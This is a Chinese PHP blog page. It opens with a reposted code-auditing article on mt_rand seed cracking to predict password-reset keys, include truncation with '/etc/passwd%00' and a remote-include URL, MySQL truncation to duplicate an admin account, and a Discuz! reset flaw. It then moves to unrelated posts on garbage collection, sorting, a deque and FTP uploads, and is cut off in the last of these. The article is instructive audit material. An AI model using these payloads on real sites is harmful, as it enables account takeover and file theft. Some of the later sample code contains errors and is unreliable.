-------------------------------------------------------------------------------
The Implementation
When mt_rand() is seeded internally or by a call to mt_srand() PHP 4 and PHP 5
<= 5.2.0 force the lowest bit to 1. Therefore the strength of the seed is only
31 and not 32 bits. In PHP 5.2.1 and above the implementation of the Mersenne
Twister was changed and the forced bit removed.
-------------------------------------------------------------------------------

   在32位系统上默认的播种的种子为最大值是2^32，这样我们循环最多2^32次就可以破解
seed。而在PHP 4和PHP 5 <= 5.2.0 的算法有个bug：奇数和偶数的播种是一样的（详见附录
[3]）,测试代码如下：

--code-------------------------------------------------------------------------

mt_srand(4);
$a = mt_rand();
mt_srand(5);
$b = mt_rand();
print $a."\n".$b;
?>
-------------------------------------------------------------------------------

   通过上面的代码发现$a==$b，所以我们循环的次数为2^32/2=2^31次。我们看如下代码：

--code-------------------------------------------------------------------------

//base on http://www.milw0rm.com/exploits/6421
//test on php 5.2.0

define("BUGGY", 1); //上面代码$a==$b时候定义BUGGY=1

$key = wp_generate_password(20, false);
echo $key."\n";
$seed = getseed($key);
print $seed."\n";

mt_srand($seed);
$pass = wp_generate_password(20, false);
echo $pass."\n";

function wp_generate_password($length = 12, $special_chars = true) {
   $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
   if ( $special_chars )
   $chars .= "!@#$%^&*()";

   $password = "";
   for ( $i = 0; $i < $length; $i++ )
   $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
   return $password;
}

function getseed($resetkey) {
   $max = pow(2,(32-BUGGY));
   for($x=0;$x<=$max;$x++) {
   $seed = BUGGY ? ($x << 1) + 1 : $x;
   mt_srand($seed);
   $testkey = wp_generate_password(20,false);
   if($testkey==$resetkey) { echo "o\n"; return $seed; }

   if(!($x % 10000)) echo $x / 10000;
   }
   echo "\n";
   return false;
}
?>
-------------------------------------------------------------------------------

   运行结果如下：

-------------------------------------------------------------------------------
php5>php rand.php
M8pzpjwCrvVt3oobAaOr
0123456789101112131415161718192021222324252627282930313233343536373839404142434
445464748495051525354555657585960616263646566676869
7071727374757677787980818283848586878889909192939495969798991001011021031041051
061071081091101111121131141151161171181191201211221
2312412512612712812913013113213313413513613713813914014114214314414514614714814
915015115215315415515615715815916016116216316416516
6167168169170171172173174175176177178179180181182183184185186187188189190191192
193194195196197198199200201202203204205206207208209
2102112122132142152162172182192202212222232242252262272282292302312322332342352
362372382392402412422432442452462472482492502512522
..............01062110622106231062410625106261062710628106291063010631106321063
3o
70693
pjwCrvVt3oobAaOr
-------------------------------------------------------------------------------

   当10634次时候我们得到了结果。

   当PHP版本到了5.2.1后，通过修改算法修补了奇数和偶数的播种相等的问题，这样也导致
了php5.2.0前后导致同一个播种后的mt_rand()的值不一样。比如：

--code-------------------------------------------------------------------------

mt_srand(42);
echo mt_rand();
//php<=5.20 1387371436
//php>5.20 1354439493
?>
-------------------------------------------------------------------------------

   正是这个原因，也要求了我们的exp的运行环境：当目标>5.20时候，我们exp运行的环境也
要是>5.20的版本，反过来也是一样。

   从上面的测试及分析来看，php<5.26不管有没有定义播种，mt_rand处理的数据都是不安
全的。在web应用里很多都使用mt_rand来处理随机的session，比如密码找回功能等等，这样
的后果就是被攻击者恶意利用直接修改密码。

   很多著名的程序都产生了类似的漏洞如wordpress、phpbb、punbb等等。（在后面我们将
实际分析下国内著名的bbs程序Discuz!的mt_srand导致的漏洞）

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：php4 php5<5.2.6
系统要求：无
审计策略：查找mt_srand/mt_rand
+++++++++++++++++++++++++

5.6 特殊字符

   其实“特殊字符”也没有特定的标准定义，主要是在一些code hacking发挥着特殊重作用
的一类字符。下面就举几个例子：

5.6.1 截断

   其中最有名的数大家都熟悉的null字符截断。

5.6.1.1 include截断

--code-------------------------------------------------------------------------

include $_GET["action"].".php";
?>
-------------------------------------------------------------------------------

   提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”，但是除了“%00”还有没有
其他的字符可以实现截断使用呢？肯定有人想到了远程包含的url里问号“?”的作用，通过提交
“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”：），好象这个
看上去不是那么舒服那么我们简单写个代码fuzz一下：

--code-------------------------------------------------------------------------

////////////////////
////var5.php代码:
////include $_GET["action"].".php";
////print strlen(realpath("./"))+strlen($_GET["action"]);
///////////////////
ini_set("max_execution_time", 0);
$str="";
for($i=0;$i<50000;$i++)
{
   $str=$str."/";

   $resp=file_get_contents("http://127.0.0.1/var/var5.php?action=1.txt".$str);
   //1.txt里的代码为print "hi";
   if (strpos($resp, "hi") !== false){
   print $i;
   exit;
   }
}
?>
-------------------------------------------------------------------------------

   经过测试字符“.”、“ /”或者2个字符的组合，在一定的长度时将被截断，win系统和*nix
的系统长度不一样，当win下strlen(realpath("./"))+strlen($_GET["action"])的长度大于
256时被截断，对于*nix的长度是4 * 1024 = 4096。对于php.ini里设置远程文件关闭的时候
就可以利用上面的技巧包含本地文件了。（此漏洞由cloie#ph4nt0m.org最先发现]）

5.6.1.2 数据截断

   对于很多web应用文件在很多功能是不容许重复数据的，比如用户注册功能等。一般的应
用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据，然
而我们可以通过“数据截断”等来饶过这些判断，数据库在处理时候产生截断导致插入重复数
据。

1) Mysql SQL Column Truncation Vulnerabilities

   这个漏洞又是大牛Stefan Esser发现的（Stefan Esser是我的偶像:)），这个是由于mysql
的sql_mode设置为default的时候，即没有开启STRICT_ALL_TABLES选项时，MySQL对于插入超
长的值只会提示warning，而不是error（如果是error就插入不成功），这样可能会导致一些截
断问题。测试如下：

--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values("admin","pass");

mysql> insert into truncated_test(`username`,`password`) values("admin x", "new_pass");
Query OK, 1 row affected, 1 warning (0.01 sec)

mysql> select * from truncated_test;
+----+------------+----------+
| id | username | password |
+----+------------+----------+
| 1 | admin | pass |
| 2 | admin | new_pass |
+----+------------+----------+
2 rows in set (0.00 sec)
-------------------------------------------------------------------------------

2) Mysql charset Truncation vulnerability

   这个漏洞是80sec发现的，当mysql进行数据存储处理utf8等数据时对某些字符导致数据
截断。测试如下：

--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values(concat("admin",0xc1), "new_pass2");
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from truncated_test;
+----+------------+----------+
| id | username | password |
+----+------------+----------+
| 1 | admin | pass |
| 2 | admin | new_pass |
| 3 | admin | new_pass2 |
+----+------------+----------+
2 rows in set (0.00 sec)
-------------------------------------------------------------------------------

   很多的web应用程序没有考虑到这些问题，只是在数据存储前简单查询数据是否包含相同
数据，如下代码：

--code-------------------------------------------------------------------------
$result = mysql_query("SELECT * from test_user where user="$user" ");
....
if(@mysql_fetch_array($result, MYSQL_NUM)) {
   die("already exist");
}
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：通读代码
+++++++++++++++++++++++++

5.6.1.3 文件操作里的特殊字符

   文件操作里有很多特殊的字符，发挥特别的作用，很多web应用程序没有注意处理这些字
符而导致安全问题。比如很多人都知道的windows系统文件名对“空格”和“.”等的忽视，这个
主要体现在上传文件或者写文件上，导致直接写webshell。另外对于windows系统对“.\..\”
进行系统转跳等等。

   下面还给大家介绍一个非常有意思的问题：

--code-------------------------------------------------------------------------
//Is this code vul?
if( eregi(".php",$url) ){
   die("ERR");
}
$fileurl=str_replace($webdb[www_url],"",$url);
.....
header("Content-Disposition: attachment; filename=".$filename);
-------------------------------------------------------------------------------

   很多人看出来了上面的代码的问题，程序首先禁止使用“.php”后缀。但是下面居然接了
个str_replace替换$webdb[www_url]为空，那么我们提交“.p$webdb[www_url]hp”就可以饶过
了。那么上面的代码杂fix呢？有人给出了如下代码：

--code-------------------------------------------------------------------------
$fileurl=str_replace($webdb[www_url],"",$url);
if( eregi(".php",$url) ){
   die("ERR");
}
-------------------------------------------------------------------------------

   str_replace提到前面了，很完美的解决了str_replace代码的安全问题，但是问题不是那
么简单，上面的代码在某些系统上一样可以突破。接下来我们先看看下面的代码：

--code-------------------------------------------------------------------------

for($i=0;$i<255;$i++) {
   $url = "1.ph".chr($i);
   $tmp = @file_get_contents($url);
   if(!empty($tmp)) echo chr($i)."\r\n";
}
?>
-------------------------------------------------------------------------------

   我们在windows系统运行上面的代码得到如下字符* < > ? P p都可以打开目录下的1.php。

+++++++++++++++++++++++++
漏洞审计策略
-------------------------
PHP版本要求：无
系统要求：无
审计策略：文读取件操作函数
+++++++++++++++++++++++++

六、怎么进一步寻找新的字典

   上面我们列举很多的字典，但是很多都是已经公开过的漏洞或者方式，那么我们怎么进一
步找到新的字典或者利用方式呢？

   * 分析和学习别人发现的漏洞或者exp，总结出漏洞类型及字典。

   * 通过学习php手册或者官方文档,挖掘出新的有危害的函数或者利用方式。

   * fuzz php的函数，找到新的有问题的函数（不一定非要溢出的），如上一章的4.6的部分
很多都可以简单的fuzz脚本可以测试出来。

   * 分析php源代码，发现新的漏洞函数“特性”或者漏洞。（在上一节里介绍的那些“漏洞审
计策略”里，都没有php源代码的分析，如果你要进一步找到新的字典，可以在php源代码的基础
上分析下成因，然后根据这个成因来分析寻找新的漏洞函数“特性”或者漏洞。）（我们以后会
陆续公布一些我们对php源代码的分析）

   * 有条件或者机会和开发者学习，找到他们实现某些常用功能的代码的缺陷或者容易忽
视的问题

   * 你有什么要补充的吗？：）

七、DEMO

   * DEMO -- Discuz! Reset User Password 0day Vulnerability 分析
   （Exp:http://www.80vul.com/dzvul/sodb/14/sodb-2008-14.txt）

   PHP版本要求:php4 php5<5.2.6
   系统要求: 无
   审计策略:查找mt_srand/mt_rand

   第一步安装Discuz! 6.1后利用grep查找mt_srand得到：

-------------------------------------------------------------------------------
heige@heige-desktop:~/dz6/upload$ grep -in "mt_srand" -r ./ --colour -5
./include/global.func.php-694- $GLOBALS["rewritecompatible"] && $name = rawurlencode($name);
./include/global.func.php-695- return "";
./include/global.func.php-696-}
./include/global.func.php-697-
./include/global.func.php-698-function random($length, $numeric = 0) {
./include/global.func.php:699: PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
./include/global.func.php-700- if($numeric) {
./include/global.func.php-701- $hash = sprintf("%0".$length."d", mt_rand(0, pow(10, $length) - 1));
./include/global.func.php-702- } else {
./include/global.func.php-703- $hash = "";
./include/global.func.php-704- $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
--
./include/discuzcode.func.php-30-
./include/discuzcode.func.php-31-if(!isset($_DCACHE["bbcodes"]) || !is_array($_DCACHE["bbcodes"]) || !is_array($_DCACHE["smilies"])) {
./include/discuzcode.func.php-32- @include DISCUZ_ROOT."./forumdata/cache/cache_bbcodes.php";
./include/discuzcode.func.php-33-}
./include/discuzcode.func.php-34-
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
./include/discuzcode.func.php-36-
./include/discuzcode.func.php-37-function attachtag($pid, $aid, &$postlist) {
./include/discuzcode.func.php-38- global $attachrefcheck, $thumbstatus, $extcredits, $creditstrans, $ftp, $exthtml;
./include/discuzcode.func.php-39- $attach = $postlist[$pid]["attachments"][$aid];
./include/discuzcode.func.php-40- if($attach["attachimg"]) {
-------------------------------------------------------------------------------

   有两个文件用到了mt_srand()，第1是在./include/global.func.php的随机函数random()里：

--code-------------------------------------------------------------------------
PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------

   判断了版本，如果是PHP_VERSION > "4.2.0"使用php本身默认的播种。从上一章里的分
析我们可以看得出来，使用php本身默认的播种的分程序两种情况：

1) "Cross Application Attacks" 这个思路是只要目标上有使用使用的程序里定义了类似
mt_srand((double)microtime() * 1000000)的播种的话，又很有可能被暴力。在dz这里不需
要Cross Application，因为他本身有文件就定义了，就是上面的第2个文件：

--code-------------------------------------------------------------------------
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------

   这里我们肯定dz是存在这个漏洞的，文章给出来的exp也就是基于这个的。（具体exp利用
的流程有兴趣的可以自己分析下]）

2) 有的人认为如果没有mt_srand((double)microtime() * 1000000);这里的定义，那么dz就
不存在漏洞，这个是不正确的。首先你不可以保证别人使用的其他应用程序没有定义，再次不
利用"Cross Application Attacks"，5.2.6>php>4.2.0 php本身默认播种的算法也不是很强
悍（分析详见上），也是有可以暴力出来，只是速度要慢一点。

八、后话

   本文是80vul的三大马甲：80vul-A，80vul-B，80vul-C集体智慧的结晶，尤其是80vul-B贡
献了不少新发现。另外需要感谢的是文章里提到的那些漏洞的发现者，没有他们的成果也就
没有本文。本文没有写“参考”，因为本文是一个总结性的文挡，有太多的连接需要提供限于篇
幅就没有一一列举，有心的读者可以自行google。另外原本没有打算公布此文，因为里面包含
了太多应用程序的0day，而且有太多的不尊重别人成果的人，老是利用从别人那学到的技术来
炫耀，甚至牟取利益。在这里我们希望你可以在本文里学到些东西，更加希望如果通过本文你
找到了某些应用程序的0day，请低调处理，或者直接提交给官方修补，谢谢大家！！

九、附录

[1] http://bbs.phpchina.com/attachment.php?aid=22294
[2] http://www.php-security.org/
[3] http://bugs.php.net/bug.php?id=40114

-EOF-

原文：http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x03_0x06.html

PHP垃圾回收机制

花太香齐 — Thu, 13 Aug 2009 13:04:36 +0000

某些语言，最典型的如C，需要你显式地要求分配内存当你创建数据结构。一旦你分配到内存，就可以在变量中存储信息。同时你也需要在结束使用变量时释放内存，这使机器可以空出内存给其它变量，避免耗光内存。

PHP可以自动进行内存管理，清除不再需要的对象。PHP使用了引用计数(reference counting)这种单纯的垃圾回收(garbage collection)机制。每个对象都内含一个引用计数器，每个reference连接到对象，计数器加1。当reference离开生存空间或被设为NULL，计数器减1。当某个对象的引用计数器为零时，PHP知道你将不再需要使用这个对象，释放其所占的内存空间。

一、PHP 垃圾回收机制(Garbage Collector 简称GC)

在PHP中，没有任何变量指向这个对象时，这个对象就成为垃圾。PHP会将其在内存中销毁；这是PHP 的GC垃圾处理机制，防止内存溢出。

当一个 PHP线程结束时，当前占用的所有内存空间都会被销毁，当前程序中所有对象同时被销毁。GC进程一般都跟着每起一个SESSION而开始运行的.gc目的是为了在session文件过期以后自动销毁删除这些文件.

二、__destruct /unset
__destruct() 析构函数，是在垃圾对象被回收时执行。

unset 销毁的是指向对象的变量，而不是这个对象。

三、 Session 与 GC
由于PHP的工作机制，它并没有一个daemon线程来定期的扫描Session 信息并判断其是否失效，当一个有效的请求发生时，PHP 会根据全局变量 session.gc_probability 和session.gc_divisor的值，来决定是否启用一个GC, 在默认情况下， session.gc_probability=1, session.gc_divisor =100 也就是说有1%的可能性启动GC(也就是说100个请求中只有一个gc会伴随100个中的某个请求而启动).

GC 的工作就是扫描所有的Session信息，用当前时间减去session最后修改的时间，同session.gc_maxlifetime参数进行比较，如果生存时间超过gc_maxlifetime(默认24分钟) ,就将该session删除。

但是，如果你Web服务器有多个站点，多个站点时,GC处理session可能会出现意想不到的结果，原因就是：GC在工作时，并不会区分不同站点的session.

那么这个时候怎么解决呢？

1. 修改session.save_path,或使用session_save_path() 让每个站点的session保存到一个专用目录，

2. 提供GC的启动率，自然，GC的启动率提高，系统的性能也会相应减低，不推荐。

3. 在代码中判断当前session的生存时间，利用session_destroy()删除.

原理详细分析：
php采用的内存管理和垃圾回收方法是基于引用计数的。在zval结构里有一个refcount是表示引用计数，还有一个is_ref表示是否是个引用变量。那么php代码的实际运行中，又是如何处理的呢？

比如这样的php代码：
$a = “hello”;
$b = $a;
这时候并不像很多人认为的那样，在内存里把”hello”这个字符串复制了一份，而只是把$b指向了和$a对应的同一个zval，然后把那个zval的refcount + 1。这样避免了一次内存拷贝。但如果在这之后改变了其中一个变量的值，比如$b.= ” world”;又会如何呢？这时候才会分配一个新的zval给$b，然后把原先那个zval的refcount – 1。这就是传说中的copy on write。就是说，在改变值得时候才会有内存拷贝。

那么引用变量又会如何呢？比如
$a = “hello”;
$b = &$a;
和前面一样，$a, $b还是指向同一个zval。只是还要把这个zval的is_ref置为1。之后再改变$a或者$b的时候就不会再发生拷贝。那么
$a = “hello”;
$b = &$a;
$c = $a;
这时又会如何呢？因为$c并不是一个引用变量，因此不能和$a, $b共用一个zval。因此在$c = $a的时候会直接产生一个新的zval。

因此，在php中，使用引用对改善性能并不会有多少作用，通常情况下还会使情况更糟。所以，引用还是只在真正需要的时候才用为好。

再说说垃圾回收。每个zval都有一个refcount表示它的变量的引用数。不管对于普通变量还是引用变量都是如此。refcount的初始值一般为1。每当增加一个引用时就+1，减少一个引用，比如unset时就会-1。当refcount为0的时候，php就会把它释放掉。这就是基于引用计数的垃圾回收方法。

使用zval

初始化zval
MAKE_STD_ZVAL(zval*);
这个宏的左右是创建一个zval，完成初始化（如将ref_count置为1，isref置为false）并把指针赋给参数。

赋值
写扩展的时候不可避免的要用到把一个zval复制到另一个zval，就是类似$a = $b;的操作。对于简单的值或许手动维护引用计数之类的还不算很麻烦但对于数组，对象之类的就需要一层层递归进去，因此就有了一个zval_copy_ctor来做着件事情。
原有一个zval* p_zval_b，
zval* p_zval_a;
MAKE_STD_ZVAL(p_zval_a); //初始化p_zval_a
*p_zval_a = *p_zval_b;
zval_copy_ctor(p_zval_a);
这里，zval_copy_ctor完成了类似赋值的操作，包括引用计数处理，对于hash值的成员处理等。

释放一个zval则是使用zval_ptr_dtor(**zval)。注意它的参数。它会释放掉为这个zval所分配的内存。

一个实例：

class ObjectTest{}
function funTest(){}

$object1 = new ObjectTest(); // 建立一个新对象: 引用计数 Reference count = 1
$object2 = $object1; // 通过引用复制: Reference count = 2
unset($object); // 删除一个引用： Reference count = 1

funTest($object2);
// 通过引用传递对象：
// 在函数执行期间：
// Reference count = 2
// 执行结束后:
// Reference count = 1

unset($object2); // 删除引用: Reference count = 0 自动释放内存空间

?>

PHP对象相互引用的内存溢出
使用脚本语言最大的好处之一就是可利用其拥有的自动垃圾回收机制（释放内存）。你不需要在使用完变量后做任何释放内存的处理，PHP会帮你完成。
当然，我们可以按自己的意愿调用 unset() 函数来释放内存，但通常不需要这么做。
不过在PHP里，至少有一种情况内存不会得到自动释放，即便是手动调用 unset()。详情可考：http://bugs.php.net/bug.php?id=33595。

问题症状
如果两个对象之间存在着相互引用的关系，如“父对象-子对象”，对父对象调用 unset() 不会释放在子对象中引用父对象的内存（即便父对象被垃圾回收，也不行）。
有些糊涂了？我们来看下面的这段代码：

class Foo{
   function __construct() {
   $this->bar = new Bar($this);
   }
}

class Bar{
   function __construct($foo = null) {
   $this->foo = $foo;
   }
}

while (true) {
   $foo = new Foo();
   unset($foo);
   echo number_format(memory_get_usage()) . "\n";
}

?>

运行这段代码，你会看到内存使用率越来越高越来越高，直到用光光。

…33,551,61633,551,97633,552,33633,552,696PHP Fatal error: Allowed memory size of 33554432 bytes exhausted(tried to allocate 16 bytes) in memleak.php on line 17对大部分PHP程序员来讲这种情况不算是什么问题。
可如果你在一个长期运行的代码中使用到了一大堆相互引用的对象，尤其是在对象相对较大的情况下，内存会迅速地消耗殆尽。

Userland解决方案
虽然有些乏味、不优雅，但之前提到的 bugs.php.net 链接中提供了一个解决方案。
这个方案在释放对象前使用一个 destructor 方法以达到目的。Destructor 方法可将所有内部的父对象引用全部清除，也就是说可以将这部分本来会溢出的内存释放掉。
以下是“修复后”的代码：

class Foo {
   function __construct() {
   $this->bar = new Bar($this);
   }
   function __destruct() {
   unset($this->bar);
   }
}

class Bar {
   function __construct($foo = null) {
   $this->foo = $foo;
   }
}

while (true) {
   $foo = new Foo();
   $foo->__destruct();
   unset($foo);
   echo number_format(memory_get_usage()) . "\n";
}

?>

注意那个新增的 Foo::__destruct()方法，以及在释放对象前对 $foo->__destruct() 的调用。现在这段代码解决了内存使用率一直增加的问题，这么一来,代码就可以很好的工作了。

PHP内核解决方案？
为什么会有内存溢出的发生？我对PHP内核方面的研究并不精通，但可以确定的是此问题与引用计数有关系。
在 $bar 中引用 $foo 的引用计数不会因为父对象 $foo 被释放而递减，这时PHP认为你仍需要 $foo 对象，也就不会释放这部分的内存……大概是这样。
这里确实可以看出我的无知，但大体意思是：一个引用计数没有递减，所以一些内存永远得不到释放。
在前面提到的 bugs.php.net 链接中我看到修改垃圾回收的过程将会牺牲极大的性能，因为我对引用计数了解不多，所以我认为这是真的。
与其改变垃圾回收的过程，为什么不用 unset() 对内部对象做释放的工作呢？（或者在释放对象的时候调用 __destruct()？）
也许PHP内核开发者可以在此或其他地方，对这种垃圾回收处理机制做出修改。
更新：Martin Fjordvald 在评论中提到了一个由 David Wang 为垃圾回收所写的补丁（其实它看起来更像“一整块布”——非常巨大。详情参见此邮件结尾的CVS导出信息。）确实存在（一封邮件），并受到了PHP内核开发成员的关注。问题是这个补丁要不要放到PHP5.3中并未得到太多支持。我觉得一个不错的折中方案就是在 unset() 函数中调用对象中的 __destruct() 方法；

参考资料：

http://bugs.php.net/bug.php?id=33595

http://hi.baidu.com/bossyt/blog/item/7965cafe556ae5395c60088c.html

http://syre.blogbus.com/logs/15765909.html

http://bbs.ctocio.com.cn/thread-7826271-1-1.html

http://phpchan.bokee.com/viewdiary.24605482.html

PHP八荣八耻

花太香齐 — Thu, 13 Aug 2009 12:58:47 +0000

以动手实践为荣 , 以只看不练为耻;

以打印日志为荣 , 以单步跟踪为耻;

以制表缩进为荣 , 以空格缩进为耻;

以单元测试为荣 , 以人工测试为耻;

以模块复用为荣 , 以复制粘贴为耻;

以多态应用为荣 , 以分支判断为耻;

以轻便高效为荣 , 以冗余拖沓为耻;

以总结分享为荣 , 以跪求其解为[......]

继续阅读

PHP排序查找相关算法总结

花太香齐 — Thu, 13 Aug 2009 12:52:07 +0000

打算找工作了，回头复习下基础，狂汗，都忘的差不多了。
下面是几个PHP排序算法，记录一下。

$arr = array(1,3,5,7,8,5,6,4,32,12,3,1);

/**冒泡排序小->大**/
function bubble_sort($arr)
{
   $c = count($arr);
   if($c <= 1) return $arr;
   for($j=1;$j<$c;$j++)
   {
   for($i=0;$i<$c-$j;$i++)
   {
   if($arr[$i] > $arr[$i+1])
   {
   $arr[$i] ^= $arr[$i+1]; $arr[$i+1] ^= $arr[$i]; $arr[$i] ^= $arr[$i+1];
   }
   }
   }
   return $arr;
}
//var_dump(bubble_sort($arr));

/**快速排序小->大 **/
function quick_sort($arr)
{
   $c = count($arr);
   if($c <= 1) return $arr;
   $left_arr = $right_arr = array();
   for($i=1;$i<$c;$i++)
   {
   if($arr[$i] < $arr[0]) $left_arr[] = $arr[$i];
   else $right_arr[] = $arr[$i];
   }
   return array_merge(quick_sort($left_arr),array($arr[0]),quick_sort($right_arr));
}
//var_dump(quick_sort($arr));

/**直接插入排序小->大**/
function insert_sort($arr)
{
   $c = count($arr);
   if($c <= 1) return $arr;
   for($i=1;$i<$c;$i++)
   {
   $temp = $arr[$i];
   $j = $i - 1;
   while($j > 0 && $arr[$j] > $temp)
   {
   $arr[$j+1] = $arr[$j];$arr[$j] = $temp;$j--;
   }
   }
   return $arr;
}
//var_dump(insert_sort($arr));

/**直接选择排序小->大**/
function select_sort($arr)
{
   $c = count($arr);
   if($c <= 1) return $arr;
   for($i=0;$i<$c;$i++)
   {
   for($j=$i+1;$j<$c;$j++)
   {
   if($arr[$j] < $arr[$i])
   {
   $arr[$i] ^= $arr[$j]; $arr[$j] ^=$arr[$i]; $arr[$i] ^= $arr[$j];
   }
   }
   }
   return $arr;
}
//var_dump(select_sort($arr));

/**二分查找（数组里查找某个元素）**/
function bin_sch($array, $low, $high, $k){
   if ($low <= $high){
   $mid = intval(($low+$high)/2);
   if ($array[$mid] == $k){
   return $mid;
   }elseif ($k < $array[$mid]){
   return bin_sch($array, $low, $mid-1, $k);
   }else{
   return bin_sch($array, $mid+1, $high, $k);
   }
   }
   return -1;
}

/**顺序查找（数组里查找某个元素） **/
function seq_sch($array, $n, $k){
   $array[$n] = $k;
   for($i=0; $i<$n; $i++){
   if($array[$i]==$k){
   break;
   }
   }
   if ($i<$n){
   return $i;
   }else{
   return -1;
   }
}

?>

PHP其实已经内置了很多有用的排序函数了，列举一下：

sort 对数组排序-重建键名低->高
rsort 对数组逆向排序-重建键名高->低

asort 对数组排序并保持索引关系低->高
arsort 对数组进行逆向排序并保持索引关系高->低

ksort 对数组按键名排序低->高
krsort 对数组按键名逆向排序高->低

usort — 使用用户自定义的比较函数对数组中的值进行排序
uksort — 使用用户自定义的比较函数对数组中的键名进行排序
uasort — 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联

natsort — 用“自然排序”算法对数组排序
natcasesort — 用“自然排序”算法对数组进行不区分大小写字母的排序

array_multisort — 对多个数组或多维数组进行排序,关联（string）键名保持不变，但数字键名会被重新索引。

用PHP实现一个双向队列-貌似是腾讯的一道笔试题

花太香齐 — Thu, 13 Aug 2009 12:48:10 +0000

用PHP实现一个双向队列-腾讯笔试题？

队列只能对头尾两个元素操作
单向队列只能从头进，从尾出
双向队列则头尾均可push,pop

baidu和google上没有查到PHP双向队列的资料，搜索到java的双向队列定义如下：双向队列（双端队列）就像是一个队列，但是你可以在任何一端添加或移除元素。
而双端队列是一种数据结构，定义如下：
A deque is a data structure consisting of a list of items, on which the following operations are possible.
* push(D,X) — insert item X on the rear end of deque D.
* pop(D) — remove the front item from the deque D and return it.
* inject(D,X) — insert item X on the front end of deque D.
* eject(D) — remove the rear item from the deque D and return it.
Write routines to support the deque that take O(1) time per operation.

翻译：双端队列（deque）是由一些项的表组成的数据结构，对该数据结构可以进行下列操作：
push(D,X) 将项X 插入到双端队列D的前端
pop(D) 从双端队列D中删除前端项并将其返回
inject(D,X) 将项X插入到双端队列D的尾端
eject(D) 从双端队列D中删除尾端项并将其返回
编写支持双端队伍的例程，每种操作均花费O（1）时间

百度百科：（deque，全名double-ended queue）是一种具有队列和栈的性质的数据结构。双端队列中的元素可以从两端弹出，其限定插入和删除操作在表的两端进行。

附我的解答程序：

class DoubleQueue
{
   public $queue = array();

   /**（尾部）入队 **/
   public function push($value)
   {
   return array_push($this->queue,$value);
   }
   /**（尾部）出队**/
   public function pop()
   {
   return array_pop($this->queue);
   }
   /**（头部）入队**/
   public function enq($value)
   {
   return array_unshift($this->queue,$value);
   }
   /**（头部）出队**/
   public function deq()
   {
   return array_shift($this->queue);
   }
   /**清空队列**/
   public function makeEmpty()
   {
   return unset($this->queue);
   }

}

class DoubleDueue
{
   public $queue = array();

   public function push($value)
   {
   return $this->queue[] = $value;
   }

   public function pop()
   {
   $count = $this->count();
   if($count >= 1)
   {
   $value = $this->queue[$count-1];
   unset($this->queue[$count-1]);
   return $value;
   }
   else
   {
   return false;
   }
   }

   public function enq($value)
   {
   /*不好做*/
   }
   public function deq()
   {
   /*不好做*/
   }

   public function count()
   {
   return count($this->queue);
   }
   public function makeEmpty()
   {
   return unset($this->queue);
   }
}

?>

貌似可以用php的四个函数解决：

array_push — 将一个或多个单元压入数组的末尾（入栈）
array_unshift — 在数组开头插入一个或多个单元
array_pop — 将数组最后一个单元弹出（出栈）
array_shift — 将数组开头的单元移出数组

参考资料：

http://www.hiahia.org/datastructure/zhanhuoduilie/zhanhuoduilie3.2.1.htm

http://phpcup.cn/viewthread.php?tid=366

js的时间戳和php的时间戳转换需要注意的地方

花太香齐 — Thu, 13 Aug 2009 12:30:54 +0000

由PHP传入JS处理的时间戳我说怎么老是对不上号呢，原来JS时间戳为13位，包含3位毫秒的，而PHP只有10位不包含毫秒的。看来得补补基础了。

附我的一个解决Comment发表时间的函数：

关于建立图片服务器的构想

花太香齐 — Wed, 20 May 2009 17:40:06 +0000

关于图片服务器的优化基本都是采用独立的域名，使用独立的域名，不光是可以并发连接的问题，还有一个重要因素是可以避免 COOKIE 的影响。下面介绍几种方案来实现图片服务器。本人在硬件方面还是个菜鸟，不对之处请谅解！

使用同步软件拷贝数据
使用ftp传递数据，php也可以操作
使用samba来共享文件夹
使用NFS来共享文件夹
使用其他专业数据存储
使用socket来post上传数据
使用curl来上传数据
AJAX、FLASH跨域上传

共享方式
NFS:在图片服务器上使用NFS服务，其他服务器上绑定NFS的共享目录，目录权限是可读可写，这样来实现读写。
其他的共享方式应该都差不多吧，没研究，需要的自己google。

因为php是不能直接在不同服务器之间存取文件的，但是我们还是可以采用FTP方式远程传输，socket方式来POST文件的。

使用FTP远程传输
PHP是支持FTP的，给个FTP类里面，自己看着办吧，上传后调用FTP类，同步到FTP服务器中，好处是现有程序只需要在上传那段加上FTP上传就行了，坏处就是一定要支持FTP。

//简单测试
if(!empty($_FILES))
{
move_uploaded_file($_FILES['pic']['tmp_name'],'ces.jpg');
$ftp = new FTP("222.***.***.15","FTP用户名","密码");
$ftp->filePut('/D:/ieliwb/ces.jpg','ces.jpg');
$ftp->closeFtp();
echo '上传成功';
}
//FTP操作类 @ www.ieliwb.com
class FTP {
public $conn;//连接句柄
/**
*构造函数
*@param $host,$port,$timeout,$username,$password
*/
function __construct($host,$username,$password,$port = 21,$timeout = 90,$ssl_connect = false,$pasv = 1) {
if($ssl_connect != false){
$this->conn = ftp_ssl_connect($host,$port,$timeout) or die("无法连接FTP！");
}else{
$this->conn = ftp_connect($host,$port,$timeout) or die("无法连接FTP！");
}
if(!@ftp_login($this->conn,$username,$password)) die("用户名或密码错误！");
$this->setPasv($pasv); //默认打开被动模式
}
/**
*获取ftp文件列表
*@param $dir
*@param $all
*@param $isforeach 是否遍历目录
*/
function getList($dir = '.' , $all = false , $isforeach = false) {
$result = ($all == false) ? ftp_nlist($this->conn,$dir) : ftp_rawlist($this->conn,$dir);
if(!$isforeach) return $result;
foreach($result as $value){
if(is_dir("$dir/$value")){
